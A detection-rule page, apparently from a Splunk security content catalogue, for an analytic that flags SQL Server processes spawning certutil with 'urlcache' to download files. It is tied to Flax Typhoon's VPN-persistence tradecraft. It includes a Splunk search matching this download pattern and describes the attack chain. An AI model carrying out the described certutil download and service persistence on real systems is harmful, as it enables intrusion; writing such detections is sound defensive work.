LoFP / the occurrence of false positives should be minimal, given that the sql agent does not typically download software using certutil.

Techniques

• T1105

Sample rules

Windows SQL Spawning CertUtil

• source: splunk
• technicques:
  • T1105

Description

The following analytic detects the use of certutil to download software, a behavior exhibited by the threat actor Flax Typhoon. This actor deploys a VPN connection by downloading an executable file for SoftEther VPN from their network infrastructure using one of several LOLBins, including certutil. The actor then uses the Service Control Manager (SCM) to create a Windows service that launches the VPN connection automatically when the system starts. This behavior allows the actor to monitor the availability of the compromised system and establish an RDP connection. This analytic identifies this behavior by monitoring for the use of certutil in conjunction with the downloading of software. This behavior is worth identifying for a SOC as it indicates a potential compromise of the system and the establishment of a persistent threat. If a true positive is found, it suggests an attacker has gained access to the environment and is attempting to maintain that access, potentially leading to further malicious activities such as data theft or ransomware attacks. Be aware of potential false positives - legitimate uses of certutil in your environment may cause benign activities to be flagged. Upon triage, review the command executed and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks.

Detection logic

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("sqlservr.exe", "sqlagent.exe", "sqlps.exe", "launchpad.exe", "sqldumper.exe") `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id 
| `drop_dm_object_name(Processes)` 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| `windows_sql_spawning_certutil_filter`